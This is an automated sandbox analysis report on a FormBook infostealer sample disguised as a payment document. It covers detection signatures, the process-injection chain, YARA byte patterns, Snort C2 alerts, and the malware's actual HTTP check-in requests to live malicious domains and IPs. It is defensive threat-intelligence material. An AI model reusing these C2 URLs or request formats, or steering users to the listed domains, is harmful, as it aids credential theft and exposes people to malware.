Windows Analysis Report
Payment Form+Inquiry LIST.exe

Overview

General Information

Sample name: Payment Form+Inquiry LIST.exe
Analysis ID: 1475677
MD5: 7f8d840982ad0a6c999a3a35e2bff6c1
SHA1: aec4c33c4513d9b7d1a9d01ed5234a060e4a6481
SHA256: b7ca9f28528677ff0664ea5968a23f19c454b72c54dcaeca4cc1c3173e6f80bc
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Payment Form+Inquiry LIST.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe" MD5: 7F8D840982AD0A6C999A3A35E2BFF6C1)
    • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 7652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
      • QYzBgoBGBcxProZWs.exe (PID: 712 cmdline: "C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • findstr.exe (PID: 7860 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • QYzBgoBGBcxProZWs.exe (PID: 692 cmdline: "C:\Program Files (x86)\BAAgnluWcYDfApnHSElJwOvwAmFVCGEOVRgeWTtyFyMmWFmra\QYzBgoBGBcxProZWs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17712:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2abd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.vbc.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2d2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x16912:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.vbc.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.vbc.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
    • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17712:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

No Sigma rule has matched

            AV Detection

            Source: http://www.lavillitadepapa.com/i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0, Avira URL Cloud: Label: malware
            Source: https://www.lavillitadepapa.com/i1fz/?mZytyNB=69, Avira URL Cloud: Label: malware
            Source: http://www.mybodyradar.net/nml2/, Avira URL Cloud: Label: malware
            Source: http://www.lavillitadepapa.com/i1fz/, Avira URL Cloud: Label: malware
            Source: mybodyradar.net, Virustotal: Detection: 10%
            Source: www.kosherphonestore.com, Virustotal: Detection: 5%
            Source: Payment Form+Inquiry LIST.exe, Virustotal: Detection: 56%
            Source: Payment Form+Inquiry LIST.exe, ReversingLabs: Detection: 57%
            Source: Yara match, File source: 3.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.1580392247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3791387211.0000000002E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3791432019.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1580637311.0000000000CA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3793025669.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3782982781.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1581046777.0000000005730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.3789791469.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: Payment Form+Inquiry LIST.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: findstr.pdbGCTL source: vbc.exe, 00000003.00000002.1580505880.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000002.3786167586.00000000014CE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: findstr.exe, 00000007.00000002.3790938279.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.000000000367C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002F70C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QYzBgoBGBcxProZWs.exe, 00000005.00000000.1504924676.00000000006CE000.00000002.00000001.01000000.00000005.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3782981021.00000000006CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: findstr.pdb source: vbc.exe, 00000003.00000002.1580505880.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000005.00000002.3786167586.00000000014CE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1580674162.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1582748260.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1580674162.0000000002BB0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.1582748260.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: vbc.pdb source: findstr.exe, 00000007.00000002.3790938279.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3792132594.000000000367C000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1922034773.000000002F70C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\findstr.exe, Code function: 7_2_006DBF10 FindFirstFileW,FindNextFileW,FindClose, 7_2_006DBF10
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push rdi, 0_2_00007FF6E8300A40
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push r14, 0_2_00007FF6E835E2E0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push rbx, 0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push rsi, 0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push rdi, 0_2_00007FF6E82D2370
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push rsi, 0_2_00007FF6E82D2680
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push rbx, 0_2_00007FF6E8251988
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push rsi, 0_2_00007FF6E83008C0
            Source: C:\Users\user\Desktop\Payment Form+Inquiry LIST.exe, Code function: 4x nop then push rsi, 0_2_00007FF6E8300910
            Source: C:\Windows\SysWOW64\findstr.exe, Code function: 4x nop then xor eax, eax, 7_2_006C9830
            Source: C:\Windows\SysWOW64\findstr.exe, Code function: 4x nop then pop edi, 7_2_006D24A9
            Source: C:\Windows\SysWOW64\findstr.exe, Code function: 4x nop then pop edi, 7_2_006D2487
            Source: C:\Windows\SysWOW64\findstr.exe, Code function: 4x nop then mov ebx, 00000004h, 7_2_03300548

            Networking

            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49709 -> 23.227.38.74:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49711 -> 84.32.84.101:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49712 -> 84.32.84.101:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49714 -> 84.32.84.101:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49715 -> 43.155.26.241:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49716 -> 43.155.26.241:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49718 -> 43.155.26.241:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49719 -> 3.33.130.190:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 3.33.130.190:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49722 -> 3.33.130.190:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49723 -> 203.161.55.102:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 203.161.55.102:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49726 -> 203.161.55.102:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49727 -> 108.179.193.98:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 108.179.193.98:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49730 -> 108.179.193.98:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49731 -> 35.241.34.216:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 35.241.34.216:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49734 -> 35.241.34.216:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49735 -> 74.208.46.171:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 74.208.46.171:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49738 -> 74.208.46.171:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49739 -> 154.92.52.196:80
            Source: Traffic, Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 154.92.52.196:80
            Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49742 -> 154.92.52.196:80
            Source: DNS query: www.mg55aa.xyz
            Source: Joe Sandbox View, IP Address: 43.155.26.241
            Source: Joe Sandbox View, IP Address: 203.161.55.102
            Source: Joe Sandbox View, ASN Name: LILLY-ASUS
            Source: Joe Sandbox View, ASN Name: VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /c7rq/?mZytyNB=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+swaARuNAxDjOzMu+VfqP1kNqiiXC0Ug==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.valerieomage.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /ktbm/?mZytyNB=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgXOWwK4/O35gX3K6ytzmMUh+twkmzSQ==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /kwl6/?54D0m=gvohHHH0&mZytyNB=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1EucVb48mJLaeeXAyU/wxkvnKBCdexA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cwgehkk.storeConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /nml2/?mZytyNB=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKr2X8+FKhtVfu//Txi/xQnlFJmGhF34A==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mybodyradar.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /tb8p/?54D0m=gvohHHH0&mZytyNB=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiIsaScbSWFF5V9pamWb9U32+hQ7ii7xg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lacemalt.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /xti2/?mZytyNB=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2pFGuXFTeP1snGKodOakbcCZ5ieg/dQ==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.siteblogoficialon.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /7npk/?54D0m=gvohHHH0&mZytyNB=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MY4r+pCVils+sXQjgc19rp6lijR1H1Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mg55aa.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /i1fz/?mZytyNB=69+72+ftTFcgCPV1pfBGcRAhZJTRakO2Kh+ZkvubWnSJrIurKkpNo2aBygpvSICGeoPjDFn9pekXwSuquQeAgXbnoNXGqYnuCVvRNE6ZSnCvZlL6jw==&54D0m=gvohHHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lavillitadepapa.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficHTTP traffic detected: GET /gtrt/?54D0m=gvohHHH0&mZytyNB=CHU0G0yFQmM3m9FspjIn2OXZQ8PvFb3qq8K3IggeoLnhuD5d4WydmEsCdQRuIbszuu3RpEHjTi2Q+otudHtA+7uFI7xmMJNqmwR/uOZtT1hR+XqCuA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.csstoneoak.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
            Source: global trafficDNS traffic detected: DNS query: www.gospelstudygroup.org
            Source: global trafficDNS traffic detected: DNS query: www.valerieomage.com
            Source: global trafficDNS traffic detected: DNS query: www.instantmailer.cloud
            Source: global trafficDNS traffic detected: DNS query: www.kosherphonestore.com
            Source: global trafficDNS traffic detected: DNS query: www.cwgehkk.store
            Source: global trafficDNS traffic detected: DNS query: www.mybodyradar.net
            Source: global trafficDNS traffic detected: DNS query: www.lacemalt.top
            Source: global trafficDNS traffic detected: DNS query: www.siteblogoficialon.com
            Source: global trafficDNS traffic detected: DNS query: www.mcxright.com
            Source: global trafficDNS traffic detected: DNS query: www.amkmos.online
            Source: global trafficDNS traffic detected: DNS query: www.mg55aa.xyz
            Source: global trafficDNS traffic detected: DNS query: www.lavillitadepapa.com
            Source: global trafficDNS traffic detected: DNS query: www.csstoneoak.com
            Source: global trafficDNS traffic detected: DNS query: www.gzlhysuess.com
            Source: unknownHTTP traffic detected: POST /ktbm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.kosherphonestore.comOrigin: http://www.kosherphonestore.comReferer: http://www.kosherphonestore.com/ktbm/Content-Length: 196Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53 Data Ascii: mZytyNB=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+NJ1RTZkU5PAjdy824WoG3bEWDs5V
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 06:17:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 06:17:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 06:17:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 06:18:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: QYzBgoBGBcxProZWs.exe, 00000009.00000002.3793025669.0000000005756000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.csstoneoak.com
            Source: QYzBgoBGBcxProZWs.exe, 00000009.00000002.3793025669.0000000005756000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.csstoneoak.com/gtrt/
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/nativeaot-c
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/nativeaot-compatibility
            Source: Payment Form+Inquiry LIST.exe, 00000000.00000002.1332005729.00007FF6E8369000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility8d8
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
            Source: Payment Form+Inquiry LIST.exeString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: findstr.exe, 00000007.00000002.3794278730.0000000007B28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: findstr.exe, 00000007.00000002.3792132594.0000000004A18000.00000004.10000000.00040000.00000000.sdmp, QYzBgoBGBcxProZWs.exe, 00000009.00000002.3791022059.0000000004668000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
